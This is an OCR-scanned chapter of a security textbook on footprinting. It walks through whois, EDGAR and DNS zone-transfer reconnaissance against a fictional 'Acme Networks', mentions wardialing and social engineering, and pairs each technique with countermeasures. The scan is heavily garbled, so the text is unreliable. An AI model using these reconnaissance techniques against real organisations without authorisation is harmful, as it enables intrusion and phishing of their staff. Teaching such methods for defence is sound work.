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B efore the real fun for the hacker begins, three essential steps must be performed. 
This chapter will discuss the first one— footprinting — the fine art of gathering target 
information. For example, when thieves decide to rob a bank, they don't just walk 
in and start demanding money (not the smart ones, an 5 rway). Instead, they take great 
pains in gathering information about the bank — the armored car routes and delivery 
times, the video cameras, and the number of tellers, escape exits, and anything else that 
will help in a successful misadventure. 

The same requirement applies to successful attackers. They must harvest a wealth of 
information to execute a focused and surgical attack (one that won't be readily caught). 
As a result, attackers will gather as much information as possible about all aspects of an 
organization's security posture. Hackers end up with a unique/ootprznt or profile of their 
Internet, remote access, and intranet /extranet presence. By following a structured meth- 
odology, attackers can systematically glean information from a multitude of sources to 
compile this critical footprint on any organization. 



WHAT IS FOOTPRINTING? 

The systematic footprinting of an organization enables attackers to create a complete pro- 
file of an organization's security posture. By using a combination of tools and techniques, 
attackers can take an unknown quantity (Widget Company's Internet connection) and re- 
duce it to a specific range of domain names, network blocks, and individual IP addresses 
of systems directly cormected to the Internet. While there are many types of footprinting 
techniques, they are primarily aimed at discovering information related to the following 
environments: Internet, intranet, remote access, and extranet. Table 1-1 depicts these en- 
vironments and the critical information an attacker will try to identify. 

Why Is Footprinting Necessary? 

Footprinting is necessary to systematically and methodically ensure that all pieces of in- 
formation related to the aforementioned technologies are identified. Without a sound 
methodology for performing this t)q)e of reconnaissance, you are likely to miss key pieces 
of information related to a specific technology or organization. Footprinting is often the 
most arduous task of trying to determine the security posture of an entity; however, it is 
one of the most important. Footprinting must be performed accurately and in a con- 
trolled fashion. 



INTERNET FOOTPRINTING 

While many footprinting techniques are similar across technologies (Internet and 
intranet), this chapter will focus on footprinting an organization's Internet cormection(s). 
Remote access will be covered in detail in Chapter 9. 
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Technology 


Identifies 


Infernef 


Domain name 
Network blocks 




Specific IP addresses of systems reachable via the Internet 
TCP and UDP services rurming on each system identified 
System architecture (for example, SPARC vs. X86) 

Access control mechanisms and related access control lists (ACLs) 
Intrusion detection systems (IDSes) 

System enumeration (user and group names, system barmers, 
routing tables, SNMP information) 


Infranef 


Networking protocols in use (for example, IP, IPX, DecNET, 
and so on) 

Internal domain names 
Network blocks 




Specific IP addresses of systems reachable via intranet 
TCP and UDP services rurming on each system identified 
System architecture (for example, SPARC vs. X86) 

Access control mechanisms and related access control lists (ACLs) 
Intrusion detection systems 

System enumeration (user and group names, system barmers, 
routing tables, SNMP information) 


Remofe 


Analog/ digital telephone numbers 


access 


Remote system t 5 q)e 
Authentication mechanisms 




VPNs and related protocols (IPSEC, PPTP) 


Exfranef 


Cormection origination and destination 
Type of connection 
Access control mechanism 


Table 1 -1 . Environments and the Critical Information Attackers Can Identify 



It is difficult to provide a step-by-step guide on footprinting because it is an activity 
that may lead you down several paths. However, this chapter delineates basic steps that 
should allow you to complete a thorough footprint analysis. Many of fhese fechniques 
can be applied fo fhe ofher fechnologies mentioned earlier. 
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Step 1. Determine the Scope of Your Activities 

The first item to address is to determine the scope of your footprinting activities. Are you 
going to footprint an entire organization, or are you going to limit your activities to cer- 
tain locations (for example, corporate vs. subsidiaries)? In some cases, it may be a daunt- 
ing task to determine all the entities associated with a target organization. Luckily, the 
Internet provides a vast pool of resources you can use to help narrow the scope of activi- 
ties and also provides some insight as to the types and amount of information publicly 
available about your organization and its employees. 



9 ' Open Source Search 



Popularity: 


9 


Simplicity: 


9 


Impact: 


2 


Risk Rating: 


7 



As a starting point, peruse the target organization's web page if they have one. Many 
times an organization's web page provides a ridiculous amount of information that can 
aid attackers. We have actually seen organizations list security configuration options for 
their firewall system directly on their Internet web server. Other items of interest include 

T Locations 

■ Related companies or entities 

■ Merger or acquisition news 

■ Phone numbers 

■ Contact names and email addresses 

■ Privacy or security policies indicating the t5q)es of 
security mechanisms in place 

▲ Links to other web servers related to the organization 

In addition, try reviewing the HTML source code for comments. Many items not 
listed for public consumption are buried in HTML comment tags such as "<," "!," and 
Viewing the source code offline may be faster than viewing it online, so it is often 
beneficial to mirror the entire site for offline viewing. Having a copy of the site locally may 
allow you to programmatically search for comments or other items of interest, thus mak- 
ing your footprinting activities more efficient. Wget (http://www.gnu.org/software/ 
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wget/ wget.html) for UNIX and Teleport Pro (http:/ / www.tenmax.com/ teleport /home 
.htm) for Windows are great utilities to mirror entire web sites. 

After studying web pages, you can perform open source searches for information re- 
lating to the target organization. News articles, press releases, and so on, may provide ad- 
ditional clues about the state of the organization and their security posture. Web sites 
such as finance.yahoo.com or http: / / www.companysleuth.com provide a plethora of in- 
formation. If you are profiling a company that is mostly Internet based, you may find by 
searching for related news stories that they have had numerous security incidents. Using 
your web search engine of choice will suffice for this activity. However, there are more 
advanced searching tools and criteria you can use to uncover additional information. 

The FerretPRO suite of search tools from FerretSoft (http:/ / www.ferretsoft.com) is 
one of our favorites. WebPerretPRO enables you to search many different search engines 
simultaneously. In addition, other tools in the suite allow you to search IRC, USENET, 
email, and file databases looking for clues. Also, if you're looking for a free solution to 
search multiple search engines, check out http: / /www. dogpile.com. 

Searching USENET for postings related to ©example.com often reveals useful infor- 
mation. In one case, we saw a posting from a system administrator's work account re- 
garding his new PBX system. He said this switch was new to him, and he didn't know 
how to turn off the default accounts and passwords. We'd hate to guess how many phone 
phreaks were salivating over the prospect of making free calls at that organization. Need- 
less to say, you can gain additional insight into the organization and the technical prowess 
of its staff just by reviewing their postings. 

Lastly, you can use the advanced searching capabilities of some of the major search 
engines like AltaVista or Hotbot. These search engines provide a handy facility that allows 
you to search for all sites that have links back to the target organization's domain. This 
may not seem significant at first, but let's explore the implications. Suppose someone in 
an organization decides to put up a rogue web site at home or on the target network's site. 
This web server may not be secure or sanctioned by the organization. So we can begin to 
look for potential rogue web sites just by determining which sites actually link to the target 
organization's web server, as shown in Eigure 1-1. 

You can see that the search returned all sites that link back to http: / / www.10pht.com 
and that contain the word "hacking." So you could easily use this search facility to find 
sites linked to your target domain. 

The last example, depicted in Eigure 1-2, allows you to limit your search to a particu- 
lar site. In our example, we searched http://www.10pht.com for all occurrences of 
"mudge." This query could easily be modified to search for other items of interest. 

Obviously, these examples don't cover every conceivable item to search for during 
your travels — be creative. Sometimes the most outlandish search yields the most produc- 
tive results. 
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Figure 1-1. With the AltaVista search engine, use the link : www. example, com directive to 
query all sites with links back to the target domain. 



EDGAR Search 

For targets that are publicly traded companies, you can consult the Securities and Exchange 
Commission (SEC) EDGAR database at http:/ / www.sec.gov, as shown in Eigure 1-3. 

One of the biggest problems organizations have is managing their Internet connec- 
tions, especially when they are actively acquiring or merging with other entities. So it is 
important to focus on newly acquired entities. Two of the best SEC publications to review 
are the 10-Q and 10-K. The 10-Q is a quick snapshot of what the organization has done 
over the last quarter. This update includes the purchase or disposition of other entities. 
The 10-K is a yearly update of what the company has done and may not be as timely as the 
10-Q. It is a good idea to peruse these documents by searching for "subsidiary" or "subse- 
quent events." This may provide you with information on a newly acquired entity. Often 
organizations will scramble to cormect the acquired entities to their corporate network 
with little regard for security. So it is likely that you may be able to find security weaknesses 
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in the acquired entity that would allow you to leapfrog into the parent company. At- 
tackers are opportimistic and are likely to take advantage of fhe chaos fhaf normally comes 
wifh combining nefworks. 

Wifh an EDGAR search, keep in mind fhaf you are looking for enfify names fhaf are 
differenf from fhe parenf company. This will become critical in subsequenf sfeps when 
you perform organizafional queries from fhe various whois dafabases available (see 
"Sfep 2. Network Enumeration"). 

O Countermeasure: Public Database Security 

Much of fhe informafion discussed earlier musf be made publicly available; fhis is espe- 
cially frue for publicly fraded companies. However, if is imporfanf fo evaluafe and classify 
fhe t 5 q)e of informafion fhaf is publicly disseminafed. The Sife Securify Handbook (RFC 
2196) can be found af hffp:/ /www.ieff.org/rfc/rfc2196.fxf and is a wonderful resource 





10 



Hacking Exposed: Network Security Secrets and Soiutions 



3 Search SEC EDGAR Archives - Microsoft Internet Explorer 




J Edit View Favoiites Tools Help 


IKfl 


1 -f- . . '.d El ai 

J Back Forward Stop Flefresh Home | Search Favorites History 


Mail Print Edit Discuss Realcom 


J Address httpi/’/'www.sec.gov/'cgi-bin/'srch-edgar 






Home I Previous Page 



U.S. Securities and Exchange Commission 



Welcome to the archive of EDGAR documents. This is an index of all EDGAR 
documents from 1993 through 2001. 



EDGAR Search; EnteraSfiai!£b_SiliDfl 



jpoundstone 

(e.g., or /aw") See Search Help 



Search 1 1993 21101 j| Simple jj 



The index is a full*text index of the header information contained in each document. Please enter vour ouerv m the search dialog box (above), 

NOTES 

a Companies that have fewer than 500 investors and less than $10 million in total assets are not required to file annual and quarterly reports with the SEC, 
a The SEC does not require companies that are raising less than $1 million under Rule 504 of Regulation D to be "registered* with the SEC^ but these companies are 
required to file a "Form D" with the SEC. The Form D serves as a brief notice ^at provides information about the company and the offering. To determine whether a 
Form D has been filed or to obtain a copy, call the SEC’s Public Reference Branch at (202) 942-3090 or contact them via e-mail at oublidnfolcPsec.Qov . 



Here is a sample header file. 

General information on retrieving data from EDGAR is availab 
For detailed information on formulating searches, look here. 



EXAMPLES 



n OR microsystems 



http://www.s6c.gov/cghbin/srch-edgar 
_ _ _ _ 



Internet 



Figure 1 -3. The EDGAR database allows you to query public documents, providing important 
insight into the breadth of the organization by identifying its associated entities. 



for many policy-related issues. Finally, remove any urmecessary information from your 
web pages that may aid an attacker in gaining access to your network. 

Step 2. Network Enumeration 



Popularity: 


9 


Simplicity: 


9 


Impact: 


5 


Risk Rating: 


8 



The first step in the network enumeration process is to identify domain names and 
associated networks related to a particular organization. Domain names represent the 
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company's presence on the Internet and are the Internet equivalent to your company's 
name, such as "AAAApainting.com" and "moetavern.com." 

To enumerate these domains and begin to discover the networks attached to them, 
you must scour the Internet. There are multiple whois databases you can query that will 
provide a wealth of information about each entity we are trying to footprint. Before fhe 
end of 1999, Nefwork Solufions had a monopoly as fhe main regisfrar for domain names 
(com, nef, edu, and org) and mainfained fhis information on fheir whois servers. This 
monopoly was dissolved and currenfly fhere is a mulfifude of accredifed regisfrars 
(hffp:/ /www.infemic.nef/alpha.hfml). Having new regisfrars available adds sfeps in 
finding our fargefs (see "Regisfrar Query" lafer in fhis sfep). We will need fo query fhe 
correcf regisfrar for fhe informafion we are looking for. 

There are many differenf mechanisms (see Table 1-2) fo query fhe various whois dafa- 
bases. Regardless of fhe mechanism, you should still receive fhe same informafion. Users 
should consul! Table 1-3 for ofher whois servers when looking for domains ofher fhan 
com, nef, edu, or org. Anofher valuable resource, especially for finding whois servers ouf- 
side of fhe Unifed Sfafes, is hffp:/ /www. allwhois.com. This is one of fhe mosf complefe 
whois resources on fhe Infemef. 



Mechanism 


Resources 


Platform 


Web interface 


http:/ /www.networksolutions.com/ 


Any platform with 




http:/ /www.arin.net 


a web client 


Whois client 


Whois is supplied with most versions 
of UNIX. 


UNIX 




Fwhois was created by Chris 
Cappuccio <ccappuc@santefe.edu> 




WS_Ping ProPack 


http:/ / www.ipswitch.com/ 


Windows 95/NT/2000 


Sam Spade 


http:/ / www.samspade.org/ ssw 


Windows 95/NT/2000 


Sam Spade Web 


http:/ /www.samspade.org/ 


Any platform with a 


Interface 




web client 


Netscan tools 


http:/ / www.netscantools.com/ 
nstpromain.html 


Windows 95 /NT/2000 


Xwhois 


http:/ / c64.org/ ~nr/ xwhois/ 


UNIX with X and 
GTK+ GUI toolkit 


Table 1-2. Whois Searching Techniques and Data Sources 
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Whois Server 


Addresses 


European IP Address Allocations 


http: / / www.ripe.net / 


Asia Pacific IP Address Allocations 


http://whois.apnic.net 


U.S. military 


http:/ /whois.nic.mil 


U.S. government 


http:/ /whois.nic.gov 


Table 1-3. Government, Military, and International Sources of Whois Databases 



Different information can be gleaned with each query. The following query t 5 q?es 
provide the majority of information hackers use to begin their attack: 

T Registrar Displays specific registrar information and associated whois servers 

■ Organizational Displays all information related to a particular organization 

■ Domain Displays all information related to a particular domain 

■ Network Displays all information related to a particular network or a single 
IP address 

▲ Point of contact (POC) Displays all information related to a specific person, 
fypically fhe administrative contact 

Registrar Query 

With the advent of fhe shared regisfry system (that is, multiple registrars), we must con- 
sult the whois.crsnic.net server to obtain a listing of pofenfial domains fhat match our 
target and their associated registrar information. We need to determine the correct regis- 
trar so that we can submit detailed queries to the correct database in subsequent steps. 
For our example, we will use "Acme Networks" as our target organization and perform 
our query from a UNIX (Red Hat 6.2) command shell. In the version of whois we are us- 
ing, fhe @ opfion allows you to specify an alternate database. In some BSD-derived 
whois clients (for example, OpenBSD or FreeBSD), it is possible to use the -a option to 
specify an alfemate database. You should man whois for more information on how to sub- 
mit whois queries with your whois client. 

It is advantageous to use a wildcard when performing this search because it will provide 
additional search results. Using a after "acme" will list all occurrences of domains that 
begin with "acme" rather than domains that simply match "acme" exactly. In addition, 
consult http:/ / www.networksolutions.com/en_US/help/ whoishelp.html for additional 
information on submitting advanced searches. Many of the hints contained in this document 
can help you dial-in your search with much more precision. 
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[bash] $ whois "acme . "0whois . crsnic . net 

[who is .crsnic.net] 

Whois Server Version 1.1 

Domain names in the .com, .net, and .org domains can now be registered 
with many different competing registrars. Go to http://www.internic.net 
for detailed information. 

ACMETRAVEL.COM 

ACMETECH.COM 

ACMES.COM 

ACMERACE.NET 

ACMEINC.COM 

ACMECOSMETICS . COM 

ACME . ORG 

ACME.NET 

ACME . COM 

ACME-INC.COM 

If we are interested in obtaining more information on acme.net, we can continue to 
drill down further to determine the correct registrar. 

[ [bash] $ whois "acme . net "Qwhois . crsnic . net 

Whois Server Version 1.1 

Domain names in the .com, .net, and .org domains can now be registered 
with many different competing registrars. Go to http://www.internic.net 
for detailed information. 

Domain Name: ACME.NET 

Registrar: NETWORK SOLUTIONS, INC. 

Whois Server: whois.networksolutions.com 
Referral URL: www.networksolutions.com 
Name Server: DNS1.ACME.NET 
Name Server: DNS2.ACME.NET 

We can see that Network Solutions is the registrar for this organization, which is quite 
common for any organization on the Internet before adoption of the shared registry sys- 
tem. For subsequent queries, we must query the respective registrar's database because 
they maintain the detailed information we want. 

Organizational Query 

Once we have identified a registrar, we can submit an organizational query. This t5q)e of 
query will search a specific registrar for all instances of the entity name and is broader 
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than looking for just a domain name. We must use the keyword "name" and submit the 
query to Network Solutions. 



[bash] $ whois "name Acme Networks " 0whois .networksolutions . com 



Acme 


Networks 


Acme 


Networks 


Acme 


Networks 


Acme 


Networks 


Acme 


Networks 


Acme 


Networks 


Acme 


Networks 


Acme 


Networks 


Acme 


Networks 


Acme 


Networks 


Acme 


Networks 


Acme 


Networks 


Acme 


Networks 



(NAUTILUS-AZ-DOM) NAUTILUS- 
(WIND0WS4-D0M) 

(BURNER-DOM) 

(ACME2-DOM) 

(RIGHTBABE-DOM) 

(ARTS2-DOM) 

(HR-DEVELOPMENT-DOM) 

(NTSOURCE-DOM) 

(LOCALNUMBER-DOM) 

(LOCALNUMBERS2-DOM) 

(Y2MAN-DOM) 

(Y2MAN2-DOM) 

for Christ Hospital (CHOSPI 



.COM 

WINDOWS.NET 

BURNER.COM 

ACME.NET 

RIGHTBABE.COM 

ARTS.ORG 

HR-DEVELOPMENT . COM 
NTSOURCE . COM 
LOCALNUMBER . NET 
LOCALNUMBERS . NET 
Y2MAN . COM 
Y2MAN.NET 

L-DOM) CHOSPITAL.ORG 



From this, we can see many different domains are associated with Acme Networks. 
However, are they real networks associated with those domains, or have they been regis- 
tered for future use or to protect a trademark? We need to continue drilling down imtil 
we find a live network. 

When you are performing an organizational query for a large organization, there may 
be hundreds or thousands of records associated with it. Before spamming became so 
popular, it was possible to download the entire com domain from Network Solutions. 
Knowing this. Network Solutions whois servers will truncate the results and only display 
the first 50 records. 

Domain Query 

Based on our organizational query, the most likely candidate to start with is the Acme.net 
domain since the entity is Acme Networks. (Of course, all real names and references have 
been changed.) 

[bash] $ whois acme.net0whois.networksolutions.com 

[whois . networksolutions . com] 

Registrant : 



Acme Networks (ACME2-D0M) 
11 Town Center Ave . 
Einstein, AZ 21098 



Domain Name: ACME.NET 
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Administrative Contact, Technical Contact, Zone Contact: 
Boyd, Woody [Network Engineer] (WB9201) woody0ACME.NET 
201-555-9011 (201)555-3338 (FAX) 201-555-1212 



Record last updated on 13-Sep-95. 



Record created on 30-May- 
Database last updated on 

Domain servers in listed 
DNS.ACME.NET 
DNS2 .ACME.NET 



95. 

14-Apr-99 13:20:47 EDT. 

order : 

10 . 10 . 10.1 

10 . 10 . 10.2 



This type of query provides you with information related to the following: 

T The regisfrant 

■ The domain name 

■ The adminisfrative confact 

■ When the record was created and updated 

▲ The primary and secondary DNS servers 

At this point, you need to become a bit of a cybersleufh. Analyze fhe information for 
clues thaf will provide you wifh more information. We commonly refer to excess infor- 
mation or information leakage as "enticements." That is, they may entice an attacker into 
mounting a more focused attack. Let us review this information in detail. 

By inspecting the registrant information, we can ascertain if fhis domain belongs to 
the entity that we are trying to footprint. We know that Acme Networks is located in Ari- 
zona, so it is safe fo assume this information is relevant to our footprint analysis. Keep in 
mind, the registrant's locale doesn't necessarily have to correlate to the physical locale of 
fhe entity. Many entities have multiple geographic locations, each with its own Internet 
cormections; however, they may all be registered under one common entity. For your do- 
main, it would be necessary to review the location and determine if if was related to your 
organization. The domain name is the same domain name that we used for our query, so 
fhis is nofhing new to us. 

The administrative contact is an important piece of informafion because it may tell 
you the name of fhe person responsible for the Internet cormection or firewall. If also lisfs 
voice and fax numbers. This information is an enormous help when you're performing a 
dial-in penefration review. Just fire up the wardialers in the noted range, and you're off to 
a good start in identifying pofenfial modem numbers. In addition, an intruder will often 
pose as the administrative contact, using social engineering on imsuspecting users in an 
organization. An attacker will send spoofed email messages posing as fhe administrative 
contact to a gullible user. It is amazing how many users will change their password to 
whatever you like, as long as it looks like the request is being sent from a trusfed technical 
support person. 
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The record creation and modification dates indicate how accurate the information is. 
If fhe record was creafed five years ago buf hasn'f been updafed since, if is a good bef 
some of fhe information (for example, Adminisfrafive Confacf) may be ouf of dafe. 

The lasf piece of informafion provides you wifh fhe aufhorifafive DNS servers. The 
firsf one lisfed is fhe primary DNS server, and subsequenf DNS servers will be secondary, 
ferfiary, and so on. We will need fhis informafion for our DNS inferrogafion discussed 
lafer in fhis chapfer. Addifionally, we can fry fo use fhe nefwork range lisfed as a sfarfing 
poinf for our nefwork query of fhe ARIN dafabase. 



TIP 



Using a s e rve r directive with the HST record gained from a whois query, you can discover the other 
domains for which a given DNS server is authoritative. The foiiowing steps show you how. 



1. Execute a domain query as detailed earlier. 

2. Locate the first DNS server. 

3. Execute a whois query on that DNS server: 

whois "HOST 10 . 10 . 10 . l"0whois . networksolutions . com 

4. Locate the HST record for the DNS server. 

5. Execute a whois query with the server directive using whois and 
the respective HST record: 

whois "SERVER NS9999-HST"0whois . networksolutions . com 



Network Query 

The American Registry for Internet Numbers (ARIN) is another database that we can use 
to determine networks associated with our target domain. This database maintains spe- 
cific network blocks that an organization owns. It is particularly important to perform 
this search to determine if a system is actually owned by the target organization or if it is 
being co-located or hosted by another organization such as an ISP. 

In our example, we can try to determine all the networks that "Acme Networks" 
owns. Querying the ARIN database is a particularly handy query because it is not subject 
to the 50-record limit implemented by Network Solutions. Note the use of the wildcard. 

[bash] $ whois "Acme Net . "0whois . arin . net 

[whois .arin.net] 

Acme Networks (ASN-XXXX) XXXX 99999 

Acme Networks (NETBLK) 10.10.10.0 - 10.20.129.255 

A more specific query can be submitted based upon a particular net block (10.10.10.0). 

[bash] $ whois lO.lO.lO.O0whois.arin.net 

[whois .arin.net] 
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Major ISP USA (NETBLK-MI-05BLK) MI-05BLK 10 
ACME NETWORKS, INC. (NETBLK-MI-1 0-1 0-1 0 ) CW-10 
10.10.10.0 - 10.20.129.255 



10 . 0.0 

10-10 



10.30.255.255 



ARIN provides a handy web-based query mechanism, as shown in Figure 1-4. By re- 
viewing the output, we can see that "Major ISP USA" is the main backbone provider and has 
assigned a class A network (see TCP/IP Illustrated Volume 1 by Richard Stevens for a com- 
plete discussion of TCP/IP) to Acme Networks. Thus, we can conclude that this is a valid 
network owned by Acme Networks. 

POC Query 

Since the administrative contact may be the administrative contact for multiple organiza- 
tions, it is advantageous to perform a poinf of confact (POC) query to search by the user's 




Figure 1 -4. One of the easiest ways to search for ARIN information is from their web site. 
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database handle. The handle we are searching for is "WB9201," derived from fhe preced- 
ing domain query. You may uncover a domain fhaf you were unaware of. 

[bash] $ whois "HANDLE WB9201 "@whois . networksolutions . com 

Boyd, Woody [Network Engineer] (WB9201) woody0ACME.NET 

BIG ENTERPRISES 
11 TOWN CENTER AVE 
EINSTEIN, AZ 20198 

201-555-1212 (201)555-1212 (FAX) 201-555-1212 



We could also search for @Acme.nef fo obfain a lisfing of all mail addresses for a given 
domain. We have fruncafed fhe following resulfs for brevify: 



[bash] $ whois "gacme . net"@whois . networksolutions . net 



Smith, Janet (JS9999) 
Benson, Bob (BB9999) 
Manual, Eric(EM9999) 
Bixon, Rob (RB9999) 



jsmith0ACME.NET 

bob0ACME.NET 

ericm0ACME.NET 

rbixon0ACME.NET 



(201)555-9211 (FAX) 
(201) 555-0988 
(201)555-8484 (FAX) 
(201) 555-8072 



(201) 555-3643 
(201) 555-8485 



O Countermeasure: Public Database Security 

Much of fhe informafion confained in fhe various dafabases discussed fhus far is geared 
af public disclosure. Adminisfrafive confacfs, regisfered nef blocks, and aufhorifafive 
name server informafion is required when an organizafion regisfers a domain on fhe 
Infernef . However, securify considerafions should be employed fo make fhe job of affack- 
ers much more difficulf. 

Many times an adminisfrafive confacf will leave an organizafion and still be able fo 
change fhe organization's domain information. Thus, firsf ensure fhaf fhe informafion lisfed 
in fhe dafabase is accurafe. Updafe fhe adminisfrafive, fechnical, and billing confacf infor- 
mafion as necessary. Furfhermore, consider fhe phone numbers and addresses lisfed. These 
can be used as a sfarfing poinf for a dial-in attack or for social engineering purposes. Con- 
sider using a toll-free number or a number fhaf is nof in your organization's phone ex- 
change. In addition, we have seen several organizations lisf a ficfifious adminisfrafive 
confacf, hoping fo frip up a would-be social engineer. If any employee receives an email or 
calls fo or from fhe ficfifious confacf, if may tip off fhe informafion securify deparfmenf fhaf 
fhere is a potential problem. 

Anofher hazard wifh domain regisfrafion arises from fhe way fhaf some regisfrars allow 
updafes. For example, fhe currenf Nefwork Solutions implemenfafion allows aufomafed 
online changes fo domain informafion. Nefwork Solufions aufhenficafes fhe domain reg- 
isfranf's identify fhrough fhree difterenf mefhods: fhe FROM field in an email, a password, 
or via a Pretty Good Privacy (PGP) key. Shockingly, fhe defaulf aufhenficafion mefhod is 
fhe FROM field via email. The securify implicafions of fhis aufhenficafion mechanism are 
prodigious. Essentially, anyone can frivially forge an email address and change fhe infor- 
mafion associated wifh your domain, better known as domain hijacking. This is exacfly whaf 
happened fo AOL on October 16, 1998, as reported by fhe Washington Post. Someone im- 
personated an AOL official and changed AOL's domain informafion so fhaf all fraffic was 
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directed to autonete.net. AOL recovered quickly from this incident, but it underscores 
the fragility of an organizafion's presence on fhe Infemef . If is imporfanf fo choose a more 
secure solution like password or PGP aufhenficafion fo change domain informafion. 
Moreover, fhe adminisfrafive or fechnical confacf is required fo esfablish fhe aufhenficafion 
mechanism via Confacf Form from Nefwork Solufions. 



Step 3. DNS Interrogation 

Affer idenfifying all fhe associafed domains, you can begin fo query fhe DNS. DNS is a 
disfribufed dafabase used fo map IP addresses fo hosfnames and vice versa. If DNS is 
configured insecurely, if is possible fo obfain revealing informafion abouf fhe organization. 



^^'^one Transfers 



Popularity: 


9 


Simplicity: 


9 


Impact: 


3 


Risk Rating: 


7 



One of fhe mosf serious misconfigurafions a sysfem adminisfrafor can make is allowing 
unfrusfed Infernef users fo perform a DNS zone fransfer. 

A zone transfer allows a secondary masfer server fo updafe ifs zone dafabase from fhe 
primary masfer. This provides for redundancy when running DNS, should fhe primary 
name server become unavailable. Generally, a DNS zone fransfer only needs fo be per- 
formed by secondary masfer DNS servers. Many DNS servers, however, are misconfigured 
and provide a copy of fhe zone fo anyone who asks. This isn'f necessarily bad if fhe only in- 
formafion provided is relafed fo sysfems fhaf are cormecfed fo fhe Infemef and have valid 
hosfnames, alfhough if makes if fhaf much easier for attackers fo find pofenfial fargefs. The 
real problem occurs when an organization does nof use a public /privafe DNS mechanism 
fo segregafe fheir exfemal DNS information (which is public) from ifs infernal, privafe DNS 
information. In fhis case, infernal hosfnames and IP addresses are disclosed fo fhe attacker. 
Providing infernal IP address information fo an unfrusfed user over fhe Infemef is akin fo 
providing a complefe blueprinf, or roadmap, of an organizafion's infernal nefwork. 

Lef's fake a look af several mefhods we can use fo perform zone fransfers and fhe 
fypes of informafion fhaf can be gleaned. While fhere are many differenf fools fo perform 
zone fransfers, we are going fo limif fhe discussion fo several common fypes. 

A simple way fo perform a zone fransfer is fo use fhe ns lookup clienf fhaf is usually 
provided wifh mosf UNIX and NT implemenfafions. We can use nslookup in inferac- 
five mode as follows: 

[bash] $ nslookup 

Default Server: dns2.acme.net 

Address: 10.10.20.2 
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>> server 10.10.10.2 

Default Server: [10.10.10.2] 

Address: 10.10.10.2 

>> set type=any 

>> Is -d Acme.net. » /tmp/zone_out 

We first run nslookup in interactive mode. Once started, it will tell you the default 
name server that it is using, which is normally your organization's DNS server or a DNS 
server provided by your Internet service provider (ISP). However, our DNS server 

(10.10.20.2) is not authoritative for our target domain, so it will not have all the DNS records 
we are looking for. Thus, we need to manually tell nslookup which DNS server to 
query. In our example, we want to use the primary DNS server for Acme Networks 

(10.10.10.2) . Recall that we found this information from our domain whois lookup per- 
formed earlier. 

Next we set the record t 5 q)e to any. This will allow you to pull any DNS records avail- 
able (man nslookup) for a complete list. 

Finally, we use the Is option to list all the associated records for the domain. The -d 
switch is used to list aU records for the domain. We append a to the end to signify the 
fully qualified domain name — ^however, you can leave this off most times. In addition, we 
redirect our output to the file / tmp / z one_out so that we can manipulate the output later. 

After completing the zone transfer, we can view the file to see if there is any interesting 
information that will allow us to target specific systems. Let's review the output: 

[bash] $ more zone_out 



acctlS 


ID 


IN 


A 


192.168.230.3 




ID 


IN 


HINFO 


"Gateway2000" "WinWKGRPS" 




ID 


IN 


MX 


0 acmeadmin-smtp 




ID 


IN 


RP 


bsmith.rci bsmith.who 




ID 


IN 


TXT 


"Location : Telephone Room" 


ce 


ID 


IN 


CNAME 


aesop 


au 


ID 


IN 


A 


192.168.230.4 




ID 


IN 


HINFO 


"Aspect" "MS-DOS" 




ID 


IN 


MX 


0 andromeda 




ID 


IN 


RP 


jcoy.erebus jcoy.who 




ID 


IN 


TXT 


"Location: Library" 


acct2 1 


ID 


IN 


A 


192.168.230.5 




ID 


IN 


HINFO 


"Gateway2000" "WinWKGRPS" 




ID 


IN 


MX 


0 acmeadmin-smtp 




ID 


IN 


RP 


bsmith.rci bsmith.who 




ID 


IN 


TXT 


"Location : Accounting" 



We won't go through each record in detail, but we will point out several important 
types. We see that for each entry we have an A record that denotes the IP address of the 
system name located to the right. In addition, each host has an HINFO record that identi- 
fies the platform or type of operating system rimning (see RFC 952). HINFO records are 
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not needed, but provide a wealth of information to attackers. Since we saved the results of 
fhe zone fransfer fo an oufpuf file, we can easily manipulafe fhe resulfs wifh UNIX pro- 
grams like grep, sed, awk, or perl. 

Suppose we are experfs in SunOS or Solaris. We could programmafically find ouf fhe 
IP addresses fhaf had an HINFO record associafed wifh SPARC, Sun, or Solaris. 

[bash] $ grep -i Solaris zone_out |wc -1 

388 

We can see fhaf we have 388 pofenfial records fhaf reference fhe word "Solaris." Obvi- 
ously, we have plenfy of fargefs. 

Suppose we wanfed fo find fesf sysfems, which happen fo be a favorife choice for af- 
fackers. Why? Simple — fhey normally don'f have many securify feafures enabled, offen 
have easily guessed passwords, and adminisfrafors fend nof fo nofice or care who logs in 
fo fhem. They're a perfecf home for any inferloper. Thus, we can search for fesf sysfems 
as follows: 

[bash] $ grep -i test /tmp/zone_out |wc -1 

96 

So we have approximafely 96 enfries in fhe zone file fhaf confain fhe word "fesf." This 
should equafe fo a fair number of acfual fesf sysfems. These are jusf a few simple exam- 
ples. Mosf infruders will slice and dice fhis dafa fo zero-in on specific sysfem fypes wifh 
known vulnerabilities. 

Keep a few poinfs in mind. The aforementioned mefhod only queries one nameserver af 
a time. This means fhaf you would have fo perform fhe same fasks for all nameservers fhaf 
are aufhorifafive for fhe fargef domain. In addition, we only queried fhe Acme.nef domain. 
If fhere were subdomains, we would have fo perform fhe same fype of query for each 
subdomain (for example, greenhouse. Acme.nef). Finally, you may receive a message sfaf- 
ing fhaf you can'f lisf fhe domain or fhaf fhe query was refused. This usually indicafes fhaf 
the server has been configured fo disallow zone fransfers from unaufhorized users. Thus, 
you will nof be able fo perform a zone fransfer from fhis server. However, if fhere are multi- 
ple DNS servers, you may be able fo find one fhaf will allow zone fransfers. 

Now fhaf we have shown you fhe manual mefhod, fhere are plenfy of fools fhaf speed 
fhe process, including, host, Sam Spade, axf r, and dig. 

The host command comes wifh many flavors of UNIX. Some simple ways of using 
host are as follows: 

host -1 Acme.net 

or 

host -1 -V -t any Acme.net 

If you need jusf fhe IP addresses fo feed info a shell scrip!, you can jusf cut ouf fhe IP 
addresses from fhe host command: 

host -1 acme.net | cut 
-f 4 -d" " >> /tmp/ip_out 
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Not all footprinting functions must be performed fhrough UNIX commands. A num- 
ber of Windows producfs provide fhe same informafion, as shown in Figure 1-5. 

Finally, you can use one of fhe besf fools for performing zone fransfers, ax f r (hffp: / / 
ffp.cdif.edu.cn/pub/linux/www.frinux.org/src/nefmap/axfr-0.5.2.far.gz) by Gains. This 




Figure 1 -5. If you’re Windows inclined, you could use the multifaceted Sam Spade to perform a 
zone transfer as well as other footprinting tasks. 




Chapter 1: Footprinting 



23 



utility will recursively transfer zone information and create a compressed database of 
zone and hosf files for each domain queried. In addition, you can even pass fop-level do- 
mains like com and edu fo gef all fhe domains associafed wifh com and edu, respecfively. 
However, fhis is nof recommended. To run axf r, you would fype fhe following: 

[bash] $ axfr Acme.net 

